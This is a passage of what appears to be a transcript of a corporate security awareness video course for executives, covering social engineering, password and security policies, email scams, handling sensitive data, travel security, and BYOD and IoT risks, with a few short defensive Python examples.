company network. And the other thing is passes and security badges. Does the company have a policy to expire them? Passwords are usually set to expire, and so too should these keys. Because these systems are all digital now, it's less of a problem, but perhaps it's a small company with a rudimentary legacy system. If someone retires or gets fired, their access should immediately be terminated, and these cards should be treated as another attack vector.
Social Engineering
[Video description begins] Topic title: Social Engineering. Your host for this
session is Jamie Campbell. [Video description ends]
In this video, I'll discuss how social engineering is conducted and how it can be
mitigated through corporate policy. Social engineering is the human side of
hacking. Hackers understand that people can often be tricked into giving up
information in person that they wouldn't give out online, even if that information is
seemingly innocent. Knowledge is power, and hackers use every bit of information
to find ways into secured systems, so they can access digital assets.
[Video description begins] Social engineering is the human side of hacking,
targeting individuals to either gain knowledge or confirm ways into an
organization's information and data [Video description ends]
In some very real ways, social engineering is as dangerous as, or in some cases more dangerous than, online hacking. It's often overlooked as a topic for staff training. And because every personality is different, different people are more susceptible to the often sophisticated tactics used by would-be attackers. There are some common social engineering techniques used by hackers. By recognizing them, you can reduce the
risk that you'll fall under the spell of a social engineering campaign.
The first is dumpster diving, a term that refers to rummaging through an
organization's trash. It's not a new idea, and when companies don't properly dispose
of potentially sensitive information, it could very well end up in a dumpster and
ultimately in the hands of a hacker. Tailgating is the act of following an authorized
person into a secure place, so if you're smooth enough, you can pretend that you're
an employee with the person in front of you, using their credentials to enter a
secure space.
Phishing is the act of trying to get information from someone by pretending you're
someone else. It might seem like a bank or some other authority calling or emailing
for more information. Pretexting is similar to phishing but a bit different, because
now the hacker pretends to be a legitimate person that needs specific information.
One common tactic is to call an employee pretending to be from technical support.
People are surprisingly trusting if they think that they're speaking with a legitimate
person and this way hackers can gain valuable information. Also similar is quid pro
quo, where a hacker tries to find someone in an organization who has a real need.
For example, calling successive numbers pretending to be tech support.
[Video description begins] Why is social engineering dangerous? [Video
description ends]
Eventually, they'll come across someone who has an actual technical problem. By
establishing this connection, the hacker hopes that the person on the other end of the line will be more trusting and give up information. Now keep in mind that these are only a
portion of the various social engineering techniques used by hackers.
And this is all to say that social engineering is effective because people are more trusting when an approach falls outside the context of what they've been told to look for. Everyone
knows they shouldn't open an attachment or click a link from an untrusted source,
or at least they should.
But put the connection out of context with something as seemingly innocent as
talking to tech support on the phone, and they may open right up. Basically, a
stranger isn't necessarily a stranger when they are standing in your living room.
And while that isn't always the case, we tend to open up a bit more when we are in
a familiar setting.
The Importance of the Corporate Security Policy
[Video description begins] Topic title: The Importance of the Corporate Security
Policy. Your host for this session is Jamie Campbell. [Video description ends]
In this video, I'll discuss the importance of corporate security policies and why they should be strictly adhered to. Corporate security policies are a funny thing. More often than not, they're well designed, but how many people in an organization actually read and understand them? Why do we need them, some may ask. Isn't it just guidance for the people in IT, the ones who are there to protect the company's information? Well, here are some facts.
First, a security policy is not a nice-to-have, it's a must-have. The legal and
financial ramifications of some sort of major security event can have a lasting
impact. And we need to be proactive, not just anticipating the worst but
understanding what the worst looks like, should it happen. And having a policy
means adhering to it, doing what it says. The problem is often that people may not
even read it.
New hires, for example, when they're onboarded, may get guidance on the policy.
They're asked to sign a document indicating that they read it. But that's not a substitute for actually reading and understanding it. And it's difficult to keep
everyone informed when the policy evolves. And it may very well evolve, but that's
a challenge that must be overcome.
And don't cut corners with your policy; it's there to protect you. The minute someone asks for a favor, hey, I know we're not supposed to have this software, but could you install it for me anyway, they've missed the entire point of the need for a policy. So, here are some hard and fast facts about a corporate security policy.
Every employee must read and sign it.
You can make it part of the onboarding process for new hires, and maybe it's not enough just to tell them to read it; explain why they need to know this. And what they
get doesn't have to be in depth, not the nitty-gritty stuff, they don't need to know
what goes on behind the scenes in IT in the event of a catastrophic power failure.
But they do need to know how it affects them and what they can do to mitigate the
risk. They certainly need to be aware of compliance issues.
Countries and geographic regions have adopted new legislation in the information
age and everyone was affected when the EU's GDPR regulations went into effect in
May of 2018. In many cases, especially when we're dealing with private
information, we are legally bound to protect that information at our own peril. But
that's an organization-wide responsibility. It's not enough that your compliance
officer understands the liability risks. The people who handle the information have
to be aware of it. And a security policy must be monitored and audited on a
frequent basis to ensure that it's doing its job.
Password Protection Policies
[Video description begins] Topic title: Password Protection Policies. Your host for
this session is Jamie Campbell. [Video description ends]
In this video, I'll discuss the importance of password policies and why they should
be adhered to. Passwords, the bane of our existence. There was a time not long ago
when we had one easy-to-remember password for everything. And no one batted an
eyelash, because we didn't face the same risks that we do today. So why do we need all this? Why all the crazy characters? Well, here's one reason, or ten.
These are the ten worst passwords used by people in 2018. And even a novice
hacker wannabe could crack these without breaking a sweat. It's kind of
reminiscent of Hollywood where someone is trying to break into a computer, and
after three tries they're in because they used your birth date. And I'm serious here.
Given the opportunity, most of us would choose something like one of these
because it makes life easier.
But here's why it's a big deal. Modern CPU speed has made brute force attacks
even scarier. There was a time 20 years ago, where if you chose eight characters of
randomized numbers, you were probably safe from the average attacker. That's no
longer the case. And look, social engineering, and particularly phishing, are a thing. We
can't ignore the sophistication of hackers, and making passwords easy to remember
just elevates the risk.
And we struggle because we're no longer in a single-password world. I shudder to admit the number of different passwords I have. But, because of password complexity, they are not easy to remember. It's a challenge, and that's why employees push back on complex passwords. But the cost of a breach can be
disastrous.
And then of course, there's what I call Sticky note syndrome. I cannot tell you the
number of times I've walked into someone's office and spied a yellow sticky note
pinned to the monitor. Not with just one password, but often multiple passwords.
That's a huge no-no, and IT admins understand that. A password policy must
incorporate strong language and strong follow-through on the physical storage of
passwords.
And you're not alone if you think this. Users don't necessarily care about security; to them, it's IT's job, and their job is to get work done. They want things uncomplicated. They want to be unencumbered, and who can blame them? But that doesn't change the
need for a strong password policy without any loopholes. No exceptions, because
every exception puts your company at greater risk.
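If you want to see what enforcing such a policy looks like in code, here's a minimal sketch in Python. The length and character-class thresholds are illustrative assumptions on my part; align them with your organization's actual written policy.

```python
# A minimal sketch of an automated password-policy check. The thresholds are
# illustrative assumptions; a real policy defines its own rules.
import re

def meets_policy(pw, min_length=12):
    """Require minimum length plus lowercase, uppercase, digit, and symbol characters."""
    classes = [r"[a-z]", r"[A-Z]", r"[0-9]", r"[^A-Za-z0-9]"]
    return len(pw) >= min_length and all(re.search(c, pw) for c in classes)

print(meets_policy("123456"))              # False: one of the worst passwords of 2018
print(meets_policy("Corr3ct-Horse-Batt"))  # True under these illustrative rules
```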
Why Never to Ask an Admin for Favors
[Video description begins] Topic title: Why Never to Ask an Admin for Favors.
Your host for this session is Jamie Campbell. [Video description ends]
In this video, I'll elaborate on the reasons why IT administrators need to protect an
organization by refusing to bend the rules. IT admins hear it all the time. You're
making my life more difficult.
[Video description begins] Why Shouldn't I Ask My Admin for a Favor? [Video
description ends]
It doesn't help that admins seem to be regarded as being on a power trip. They're
the ones in control. Honestly, it can be a thankless job at times, but it's the responsibility of the admin to hold the keys to the kingdom and protect them at all costs.
So have you heard anyone say this to an admin? Maybe you've even said it: I hate this password, I already have ten others I have to memorize, and you've given me this garble of characters and numbers. And why does it have to change every 90 days? Can't you help a guy out? Look, no one likes to impose these kinds of restrictions, at least not without reason.
The fact is we have strong password policies in place to protect you, me, your
colleagues, the guys upstairs, the suppliers, the customers, everyone, the very
company itself. And IT has been given the awesome task of enforcing that policy
and they will not relent because they understand the seriousness of the risk. How
about this one? I need this app to do my job. It's really great. My friend over at
company ABC gets to use it, so why not me? Well, ABC company probably needs to reassess its security policy, because we have reasons for disallowing errant software that we know nothing about. It creates a new wrinkle, adds to the attack surface, and beyond that, if an admin were to cut you a break and install the
software on your laptop, what's to stop everyone else from asking for the same
favor?
See the problem? Why can't my phone access my network folder? Simply put, it's a
bad idea to give a mobile device like a phone or tablet that kind of access. There are
too many variables, specifically too many different mobile operating systems and
kinds of devices often with sketchy apps and poor or no security software.
Besides, mobile OSs don't really play well with traditional network protocols
probably because it's not really what they were designed for. Now, there are apps
that can provide that kind of access, but that in itself is a reason against the practice
because you won't find one from any of the big software providers.
And the capability to connect to a Windows or Linux network isn't built into these
devices. In the event that you need access to something, say a Word, Excel or a
PowerPoint file, web applications that can be accessed through a browser are the
best bet. And IT normally has some sort of Cloud provision that adds a layer of
security or something living inside the DMZ that will suffice for accessing your
files on the go.
[Video description begins] Facts about IT [Video description ends]
I'll leave you with this. IT is there to do a job, just like everyone else. They're
accountable, just like everyone else. But really what's important to know is, that
they're to protect you and others, not just the data or a nebulous concept like the
integrity of the network. They want to help, but they have policies and procedures
designed that way because they work. And they're bound by a code of ethics, no
less important to them than to another professional, a lawyer, a doctor, anyone like
that.
Anyone entrusted with the information that could be damaging were it to become
public. And on a very real note, an administrator could be fired for bending the
rules. In some instances they may even be subject to legal or fiduciary penalties for
breaking the rules. So it helps to remember that they're there for you, and they're
there for the company. And you're better off for having them there to protect and
enforce the rules.
Exercise: Describe Security Threats
[Video description begins] Topic title: Exercise - Describe Security Threats. Your
host for this session is Jamie Campbell. [Video description ends]
Now that you've learned about security threats it's time to put some of that
knowledge to work.
In this exercise you'll describe security threats. You'll explain what an attack
surface is. Explain what a demilitarized zone is. Explain threats, vulnerabilities, and
risks. Explain four top security threats. And explain what social engineering is. At
this point you can pause this video and answer these questions. When you're done,
resume the video to see how I would answer them. Okay, let's answer these
questions. It's okay if you didn't answer them exactly the same way.
First, explain what an attack surface is. Well, an attack surface is all the nodes,
users, devices, and entry points representing potential vulnerabilities of a software,
network, or business environment.
Next, explain what a demilitarized zone is. A demilitarized zone is a logical,
sometimes physically partitioned space between the entry point to a network, the
firewall, and the interior of a network or LAN. Its purpose is to provide a barrier
between the outside world and an organization's sensitive information.
Next, explain threats, vulnerabilities, and risks. Well, threats are potential sources
of danger. Vulnerabilities are potential sources of exploit. And risks are the
elements or assets that can be lost if threats meet vulnerabilities.
Next, explain four top security threats. Generally, the four top security threats to
organizations are malware, social engineering, unpatched software, and bring your
own device and the Internet of things.
Finally, explain what social engineering is. Social engineering can be characterized as the human side of hacking, where hackers target individuals to either gain knowledge or find ways to access an organization's information and data.
I hope you found this exercise helpful.
An Executive's Guide to Security:
Protecting Your Information
This 13-video course explores data protection for businesses, including devices,
social media, and good governance through security principles, policies, and
programs. You will examine several types of security threats, the different types of
network attacks, the role physical security plays in the protection of corporate data,
and the human element of security threats. Next, learners examine the attack
surface, including the total combined nodes, users, devices, and any entry points of
software, a network, and a business environment. You will examine threats,
vulnerabilities, and risks, and learn the importance of network hardening. This
course uses real-world examples of several top security threats to businesses today,
including malware, social engineering, unpatched software, BYOD (bring your
own device), and IoT (Internet of things). You will examine clickjacking and URL
spoofing. Finally, this course discusses the legal and financial ramifications of a
major security breach, the importance of having a security policy, training
personnel, password protection, and managing a company's security.
Course Overview
[Video description begins] Topic title: Course Overview [Video description ends]
Hi, I’m Jamie Campbell, with almost 25 years as an IT consultant, marketing and communications expert, and professional writer. I’m a technology enthusiast with a
passion for gadgets and a flair for problem solving. I've worked in the IT,
publishing, and automotive industries, and
[Video description begins] Your host is a Senior IT Consultant. [Video description
ends]
I'm also an accomplished web designer. Additionally, I've been a technology
instructor. I write for various tech blogs, and have authored and published four
novels. Breaches of company information are reported on a regular basis, and it has
never been more important that companies protect their information.
Organizational leaders must lead the charge, but it's often a challenge to understand
the risks and security principles designed to keep an organization safe. Companies
often mishandle data because personnel misunderstand practices, risks, and
implications.
In this course, I'll describe data protection practices, including security on the road,
email security, handling sensitive data, and best practices for sharing data. We'll
also explore challenges specific to devices and social media, and good governance
through security principles and programs.
Security on the Road
[Video description begins] Topic title: Security on the Road. Your host for this
session is Jamie Campbell. [Video description ends]
In this video, I'll discuss best practices for working with and handling corporate
information while traveling.
[Video description begins] Screen title: Security on the Road [Video description
ends]
Working on the road is an absolute necessity, and there's no getting around it. But
how we work on the road is something that could use some work. For example,
consider these disturbing statistics from Kaspersky. 48% of senior managers and 43%
of mid-level managers use unsecure public access Wi-Fi networks to connect work
devices on the road. 44% of senior managers and 40% of mid-level managers use
Wi-Fi to transmit work emails with sensitive or confidential attachments. Security
professionals see numbers like this and it gives them fits. Why is that?
Well, there are innumerable reasons. First, let's take a look at problem points for
accessing a network from the road. Just like inside an organizational network
there's an attack surface represented by remote work and several possible attack
vectors. Laptops, while incredibly useful, can be compromised if left alone or lost.
Wi-Fi access points aren't always secure, in fact quite the opposite.
Of course, mobile is its own risk category. Keys and security passes. No one thinks
about keys as being a security risk, but if someone with malicious intent gets their hands on a pass, it could be disastrous. The cloud also represents a risk; while it can be very secure, more and more company information is moving there. Physical
documents, like confidential files and reports, can be stolen or destroyed. Your
device configuration could be an issue.
For example, a smartphone which hasn't been locked down with a PIN or
fingerprint. The Internet, of course, and web browsers, represent a risk if improper
pages and links are accessed. Removable media like USB drives are a problem
because they're small and easy to misplace. Security settings on mobile devices are
problematic, and it's not common practice to have legitimate anti-malware software installed on them. More companies are offering or requiring it for employees who use their personal devices for business, however, and I hope that practice continues.
And finally, Bluetooth, which has a limited range, still represents a security risk.
[Video description begins] 11 icons representing the major problem points on the road display: laptop, Wi-Fi, mobile devices, keys and security passes, the cloud, physical documents, device configurations, Internet and web browsers, removable media devices, security settings on mobile devices, and Bluetooth. [Video description ends]
So here’s why all that concerns IT administrators. Public Wi-Fi is often unsecured
and even unencrypted. It’s very convenient to stop into a coffee shop and check
your email over the shop’s network, but how certain are you that the purveyors set
up their security so your information would be protected?
A lack of mobile security or poor security software represents a vulnerability. Auto-connect, also convenient, is not always a good idea. If you frequent a place, it's nice not to have to reconnect manually every time you go there, but it's easy to forget all the different places we've connected to, and things change. Maybe some hacker got wise and set up a wireless router that uses the same SSID as the coffee shop; it's not that hard to do.
Again, Bluetooth, which connects devices to each other over a limited range, can
actually connect to devices up to 100 meters away. It's a vulnerability, and I'd
recommend disabling Bluetooth until you need it. And then there's the speed of
business, which can lead to sloppiness. You get a text telling you that a report
absolutely has to be there within the hour. You're not going to be near a secure
connection in that time, the report contains very sensitive information. You're
sitting in a restaurant that has free Wi-Fi.
And because you've been there before, your device automatically connected to their
network which they haven't secured with encryption. That's a vulnerability. Other
travel troubles include lack of device locking, say automatic locking after a minute or two of inactivity. My devices are set up not only to do that, but to routinely ask for my PIN in addition to my fingerprint, say after the phone's been reset. It's just a nice
additional feature that provides some peace of mind.
Passwords, especially easy ones, are fairly easy to deduce when someone is looking
over your shoulder. Lack of current software can be troublesome. Patching is an
ongoing process and it's not a bad idea to ensure that your devices are up to date
before you leave on a trip. The failure to back up your data in the event of a
catastrophic failure. And always a contentious one, thumb drives and other
removable media, because they're easy to lose and easy to remove and pocket, it's a
good idea to avoid using these to store sensitive information.
[Video description begins] Screen title: Security on the Road [Video description
ends]
When you're on the road and lose a device or suspect that it's been stolen, you
should treat it like a lost credit card. Report it immediately. If you suspect that it's
been stolen and have remote locking capability, a must for any device, then lock it
or wipe it. In the past, I was a road warrior moving from city to city five days a
week,
[Video description begins] Two bullet points display on the screen. Bullet 1, Lost or
stolen devices must be reported immediately. Bullet 2, Treat a misplaced device as
a misplaced credit card or wallet. [Video description ends]
so I know this as well as anyone. It's easy to feel the pressures of business,
especially on the road, but if you are a business traveler it's important to be aware
of the additional risks. It's my hope that organizations train people to be aware of
the risks of handling business information while they're on the move. It's a
precautionary measure that has no downside.
E-mail Security
[Video description begins] Topic title: E-mail Security. Your host for this session is
Jamie Campbell. [Video description ends]
In this video, I'll discuss the problems presented by organizational and personal
email, and best practices for working with email, including how to protect yourself
from spam.
[Video description begins] Screen title: E-mail Security [Video description ends]
Email is still very much a thing, particularly in the business world. So allow me to
indulge myself with what I call Campbell's law: any email that asks for personal information must be ignored. And here's why you can safely do that. I'll
use the example of a common spam campaign that occurs every year, particularly
around tax time.
You get an email that appears to be from the IRS stating that you've got a refund
coming to you, or worse, that they're taking you to court. Spam is designed to prey
on people's fears, and people do fall for it. But you've probably heard organizations
like the IRS, or banks, or other institutions telling you that they'll never contact you
via email asking for information or discussing personal matters.
Regardless of their policy, if you receive such an email and suspect it might be
legitimate, the appropriate response is to save a copy of the email, pick up the
phone, and dial the number of the institution. That way, you know you're dealing
with the actual organization. These are common spam techniques that hackers and
scammers use to trick you.
Spear phishing works by getting some personal information on you upfront. Your
name, maybe some details about where you work, what you do, who your
colleagues are, that kind of thing. And then crafting an email just for you, so it's
more devious than general spam, like the IRS example.
The Nigerian 419 scam has been around for almost as long as email. Named after
the section of the Nigerian criminal code that deals with fraud, this is the scam
where someone pretending to be a prince or a rich person contacts you and asks for
help to get money out of the country. All you have to do is wire them some money
first as a show of good faith. And this one is fairly new, but as a security
professional, I must admit that I'm surprised it took this long.
Email address spoofing. You receive an email apparently from your own email
account with a message telling you that you've been hacked. The scammer may get
into a bit of detail about how they did it, but it's always sketchy, and the spelling
and grammar are poor. They give you a Bitcoin wallet address to send them a
payment. Here’s why I'm surprised that it took this long.
Spoofing an email address, setting an email account up to appear that it’s coming
from someone else, is ridiculously easy. I could show you how to do it in under a
minute. Someone finally got wise to it and decided to scam people. It’s been pretty
prevalent over the past year or so. And if you receive one of these emails, you can
safely ignore it.
And then there is impersonating the boss, which is a bit of a spear phishing
campaign and a bit of email spoofing. You receive what appears to be an email from the CEO, a senior executive, or an owner. Like email spoofing, this is known as impersonation fraud.
And employees should know what to look for so they can detect these scams.
Here are some common ways that hackers and scammers try to get you to infect
your organization's network. Spammers are phishing for a reply from you. Even if
you know it's spam and you feel like replying to ask the emailer not to contact you
again, don't. Some of these scammers want to validate that this is an email address
that you use perhaps so they can bombard you with more email.
Fake links appear to be one thing but are actually another. This technique is similar
to email spoofing in the sense that the hacker or scammer impersonates a legitimate
web address. If you know anything about HTML, you know that when you create a
web link, you can give it a different name than the URL. Useful because URLs can
get quite long. So you may see a link in an email that says www.irs.gov or
www.abcbank.com. It looks legit, right? Well, don't click it.
A good email reader should allow you to hover the mouse over the link and pop up the actual address. If your email reader doesn't have that capability, simply right-click the link, choose copy link in the fly-out menu, then paste it into a text editor. If it's anything but a legitimate link, then it's fraudulent.
Another trick attackers use is to create a link that looks like it's from a legitimate
company, but they add a domain extension to the end. So, for example, irs.gov.org
or abcbank.com.biz, something other than the actual site. The last extension is
always the one to look for because that's the one that determines where the link will
navigate to.
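Here's a hedged sketch in Python of checking where a link actually points. The two-label heuristic for the registrable domain is rough, and real checks should consult the public suffix list; the example URLs are hypothetical.

```python
# A hedged sketch of checking where a link really goes. The two-label heuristic
# for the registrable domain is rough; real checks should use the public suffix list.
from urllib.parse import urlparse

def describe_link(display_text, href):
    host = urlparse(href).hostname or ""
    registrable = ".".join(host.split(".")[-2:])  # the rightmost labels decide where you really go
    return f"shown as {display_text!r}, actually goes to {host!r} (registrable domain: {registrable!r})"

print(describe_link("www.irs.gov", "http://irs.gov.org/refund"))
# shown as 'www.irs.gov', actually goes to 'irs.gov.org' (registrable domain: 'gov.org')
```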
Chameleon attachments are attachments pretending to be something else. For
example, what looks like a PDF is actually an executable. And embedded images
can be dangerous because a hacker can exploit a system using a technique called
buffer overflow, where the image contains additional information, code, for
example. That gets executed because the email program receives more image data
than it expects. That's why email readers try to flag potentially dangerous emails by
disabling links and images, but they're not always successful.
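As an illustration of catching a chameleon attachment, here's a hedged sketch in Python that compares a file's leading magic bytes with its claimed extension. The signatures shown are common, well-known ones; real tooling should rely on a fuller signature database such as libmagic, and the file name in the usage comment is hypothetical.

```python
# A hedged sketch: compare a file's leading "magic bytes" with its claimed
# extension. Only a few well-known signatures are shown here.
MAGIC = {
    b"%PDF":       "pdf",
    b"MZ":         "exe (Windows executable)",
    b"PK\x03\x04": "zip-based (docx, xlsx, zip)",
}

def sniff(path):
    """Return a rough guess at the file type based on its first bytes."""
    with open(path, "rb") as f:
        head = f.read(8)
    for signature, kind in MAGIC.items():
        if head.startswith(signature):
            return kind
    return "unknown"

# Usage, with a hypothetical attachment saved to disk:
# detected = sniff("invoice.pdf")
# if detected != "pdf":
#     print(f"Warning: the file does not look like a PDF (detected: {detected})")
```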
Some common warning signs of a scam include the false sense of urgency, an
email telling you that you have to act now, often with threats of legal action. Poor spelling and grammar is a classic tell that an email isn't legitimate. If you receive an email that's supposedly from a bank and it's laden with spelling errors, then you can
safely assume that it's spam.
Any email that asks for any personal information, I can't stress this enough. People
get lulled into a false sense of security, and they'll give up their account numbers,
passwords, mother's maiden name, you name it. You should always contact an
organization using the tried-and-true method of the telephone because these
organizations have published phone numbers.
And in lockstep with false sense of urgency, the threat, someone telling you that
your account will be disabled or locked, or saying that they have compromising
information. These are all classic tales of a spam scam. So it's worth reinforcing
everything I've said with some best practices. One, don't open attachments unless
you're absolutely certain that it's from a legitimate sender. Think before you click.
Become aware of the different techniques used for email spoofing keeping in mind
that spammers are coming up with the novel techniques all the time.
So it's more than understanding what they've done in the past. It's about
understanding what makes something legitimate. And once again, hover over a link
to see if it's a real deal. Furthermore, don't use your personal email for business
purposes. I'm sure that most people don't, but we all know that it's been done. Use
your malware scanner. People often rely on automatic scanning without realizing
that they can scan on demand. If it's an attachment and you're, say, 90% certain that
it's legit, right-click it.
The fly-out menu should have options for your installed antivirus software,
something saying scan now. Treat your email passwords the same way you treat
every other password. That is, make them strong, and keep them secure. And look,
it's not a bad idea to see if you've been pwned. If you're not familiar with the term,
it means, I own you.
And while it originated in online gaming, it's now understood to
mean you've been compromised or hacked. If you do a web search of the term
pwned, you'll find a couple of links that allow you to enter your email address. It
checks your email address against known data breaches to determine if your
information was caught up in a breach. Now if you have been pwned, you should
locate the site where you were compromised to change your password with that site
and determine what kind of information was compromised.
Finally, don't enable macros, which are small bits of code that became popular in
Office software. Years ago, around the late 90s I believe, it was discovered that
hackers could inject malicious code into Office documents like a spreadsheet or
word processing document. Vendors like Microsoft responded quickly to disable
macros by default, but the problem still persists. If you use a modern version of
Office and receive an Excel or Word document by email, you probably know that
you can't open it without disabling the block that Outlook puts on it. That's to
prevent you from opening suspicious, probably macro-enabled documents.
Again, learn how to recognize scams, the techniques that scammers use.
Understand how URLs work, how they can be spoofed. And, ultimately, protect
your email addresses. It's inevitable that you have to use your business email in
certain situations, but I have several different addresses that I use for specific
purposes to avoid a massive amount of spam in my inbox.
How to Handle Sensitive Data
[Video description begins] Topic title: How to Handle Sensitive Data. Your host for
this session is Jamie Campbell. [Video description ends]
In this video, I'll discuss the proper ways to handle sensitive company information,
including the differences between working with online data and physical media.
Handling sensitive data is a responsibility but it's not always clear what constitutes
sensitive data. So let's spend some time understanding what it means and how you
should handle it.
Generally, sensitive data contains company information. So information about
people, procedures, processes, anything that might not be public knowledge. Client
information, of course this is an important one because clients won't be very
forgiving if some piece of important information gets out into the wild. Financial
information, sales, revenues, anything that pertains to an organization's financial
matters. And personal information about you, a supplier, or a customer.
[Video description begins] Screen title: How to Handle Sensitive Data [Video
description ends]
Generally your organization will define what constitutes sensitive information. But
if you're uncertain, the best rule of thumb is to regard any information that you
receive as sensitive until you know otherwise. To illustrate the importance of how
information should be handled,
[Video description begins] Screen title: It's Not Always About the Network [Video
description ends]
I'll give you an example of how not to handle data. In 2008, a USB drive that was
infected with malware was inadvertently inserted into a laptop at a US military base
in the Middle East. The result was what's been called the most significant breach of
US defense networks in history. Now, in that scenario, we don't know why that
USB drive was infected or what kind of information it contained. But putting a
removable disk in a computer is something we do all the time and it can have
consequences. So how do you protect sensitive data?
First, encryption is a great way to do it. And everyone handling the most sensitive
of data should use encryption where possible. OSs even have built in encryption
that you can take advantage of. Store your information on lockable devices. So on a
secure phone or tablet for example that has strong locking features like biometrics.
Never share information over a public network.
What's a public network? When you sit down at a coffee shop and log in to their
free WiFi, that's a public network. When you check into a hotel room and plug in
their Ethernet cable to your laptop. That's a public network. Anything that's not
your own network should be regarded as public. And that leads to my next point.
Only share on secured networks. Large companies might use a VPN, which is a
secure connection to the network that uses an encryption technique known as
tunneling. That's a preferred method.
And never store your sensitive information on removable devices because they're
easily lost or misplaced. One example is a hard drive owned by the National Archives and Records Administration; not necessarily a removable device, but it does illustrate the point. In 2008, this hard drive stopped working. It was sent to an outside company, which determined the drive couldn't be fixed.
Apparently, the drive was sent for destruction but nobody can confirm whether this
actually happened. And the drive contained personal information about 75 million
US veterans, including Social Security numbers. An investigation ensued and the
administration took a black eye. So protecting your information and the
information of others is paramount to IT security.
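Coming back to the earlier point about encryption, here's a minimal sketch of encrypting data at rest using the Python cryptography package. That package choice is an assumption on my part; your platform may instead rely on built-in OS encryption. Key handling is deliberately simplified here.

```python
# A minimal sketch of encrypting data at rest with the 'cryptography' package.
# In practice, the key must be stored and protected separately from the data,
# typically in a key vault or hardware-backed store.
from cryptography.fernet import Fernet

key = Fernet.generate_key()      # keep this somewhere safer than the data itself
fernet = Fernet(key)

sensitive = b"Q3 revenue forecast: internal use only"   # stand-in for a real file's contents
ciphertext = fernet.encrypt(sensitive)

# Only someone holding the key can recover the plaintext.
assert fernet.decrypt(ciphertext) == sensitive
```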
When and What to Share
[Video description begins] Topic title: When and What to Share. Your host for this
session is Jamie Campbell. [Video description ends]
In this video, I'll discuss sharing data with colleagues, customers, and the public.
[Video description begins] Screen title: When and What to Share Sensitive
Data? [Video description ends]
IT admins are sometimes like protective mother bears, and they would like it if you never shared information, because they usually bear the brunt of the fallout, and they understand the myriad risks. But it's not practical and they know it, so
when and how should you share data?
First, what should you share? Physical documents? Yes and no. Removable media,
yes and no. Digital files, and I'm sure you figured it already, but yes and no. Look,
this is not always easy to determine but there are instances when you do need to
share using any of these methods. It's more important that you understand how to
share on a case-by-case basis because there's a case to be made for each of these
methods.
[Video description begins] Icons for physical documents, removable media, and
digital files display. Each icon is followed by yes and no options to show the
choices we face- whether or not to share. [Video description ends]
In reality, you have to conduct business, and that means sharing information that, if compromised, if it gets out into the wild, could result in serious business, financial, or legal ramifications. So rather than saying, I can't share that, you really need to ask yourself, should I share that?
[Video description begins] Screen title: When to Share Sensitive Data [Video
description ends]
There are reasons to share sensitive information. You trust the source of the
information, that is, where you received it. You trust the delivery method, whether
it's physical or digital. And most importantly, you trust the party you're sharing the
information with to not put you in a compromising situation.
So how do you establish trust on all those levels? Well, an organization that has a
clear and unambiguous policy, has secure methods and processes and honors a
culture of never bending the rules, is well positioned to avoid the embarrassment
and legal exposure related to costly data breaches.
BYOD and IoT
[Video description begins] Topic title: BYOD and IoT. Your host for this session is
Jamie Campbell. [Video description ends]
In this video, I'll discuss BYOD and IoT and how they pose a unique security threat
for organizations. BYOD, or Bring Your Own Device, and IoT, or Internet of
Things, each represent a fairly new and unprecedented attack surface for
organizations. So I would like to drill down a bit into it and discuss why they
matter.
First, Bring Your Own Device, it's been around for a while but before 2007 when
the iPhone was first released, personal devices weren't as much of an issue. Before
then we had mobile phones with limited capabilities and, perhaps, laptops, personal
laptops people could bring to work. But I think most companies provided work
laptops. Blackberries were really the only outlier, but they weren't using Wi-Fi to
connect to company networks, at least not at the time.
Other handheld devices, PDAs mostly, didn't offer much or any connectivity. In any event, all that changed when the iPhone rolled out, followed about a year later by Android smartphones and, to a lesser extent, Windows phones.
Things exploded pretty quickly, and now we have these ultra powerful handheld
computers and phones and tablets, and even wearable devices like watches. This
led some companies to disallow personal mobile devices from connecting to the network, and it led other companies to see an opportunity. The term BYOD was born sometime around 2013, I think, but it could have been earlier than that.
[Video description begins] Icons for BYOD checklist, handheld devices, and
wearable devices display. Screen title: Benefits of BYOD [Video description ends]
The opportunities they recognized include the way that these devices take
advantage of mobile technologies. The Blackberry was pretty revolutionary when it
came out in the early 2000s, because having email on the road was pretty darn
useful. Smart phones upped the ante by providing this as well as web surfing and
any conceivable function you could package into an app. This gave rise to greater
employee efficiency because of the additional work tasks they could perform when
on the move.
And having your personal device, your own device, added a comfort level for most
people. Being able to use the same device for personal purposes without having to
switch to a different device for work purposes has its benefits. And all that makes
employees happy and we all want to make our employees happy. But there are
drawbacks to BYOD, which is why some companies disallow it. A secure network
is only as secure as its weak points, and mobile security has been missing in action
for the most part, only becoming a thing in the past few years.
And even with legitimate security software, users can install apps, and apps have
their own problems in terms of security. For example, why would a free poker app
need access to your contacts or telephone? Now, I made that up but there are plenty
of real examples of apps requesting access for functions they probably shouldn't
have access to. And there's an exponential aspect to personal mobile devices.
[Video description begins] Third bullet appears. It reads: Adds attack vectors
exponentially. [Video description ends]
Think about this, 20 years ago, we had a desktop computer at work, maybe a laptop
if we spent time on the road, and that was it. Those were the only things that connected to the company network, and they were company-owned devices that were made secure
by IT. Today, you can have a desktop computer and a laptop and a tablet and a
smart phone and a smart watch, all connecting to the wireless network at the office.
That's not a stretch to imagine because we're actually seeing it, and that means
we're exponentially growing the attack surface by adding more vectors. Then
there's a cost to BYOD. It's often suggested that letting employees use their own
devices can mean the company doesn't have to purchase one for them. Everyone
has a smart phone these days so why not save by allowing them to have access to
the company network?
But the reality is that the total cost of ownership has grown significantly for mobile
devices, even if the personal devices are not company owned. More devices, again,
remember the number of devices has grown exponentially, means more demand on
network bandwidth, especially with multimedia. And security hardware and
software has to be expanded due to greater bandwidth requirements and a larger
attack surface. So you really have to balance the cost of BYOD versus a lot of the
benefits that it brings in terms of working in an office environment.
Let's turn to the Internet of Things, or IoT. This is newer than BYOD, but no less
troublesome for security professionals, more so in some ways. In the past ten years,
devices and appliances have got smarter by becoming network aware. That is, you
can now plug a device into the Internet that you couldn't have before, things like
smart appliances, Internet connected fridges, for example.
Wearable technology like smart watches, smart TVs with apps have been around
for some time now, and there are also smart cars, too. They can connect. Smart
buildings with network aware systems like lighting or heating, all these things
increase the attack surface even further than before.
[Video description begins] A graphic displays. It shows the various IoT
applications. The label IoT applications displays in the center of the circle and
arrows project outwards from this circle and point to the 5 major IoT applications:
smart appliances, smart TV, smart car, wearables, and smart buildings. [Video
description ends]
So what are the benefits of IoT? Well, the integration of technology into other
devices has proven awfully useful. Devices have become smarter, performing tasks
for us that help in a multitude of ways, controlling lighting systems in a building to
reduce energy and save money, installing apps on the TV in the boardroom to, say,
review the company's YouTube channel.
There are plenty of benefits to smart technology, making them more useful. And
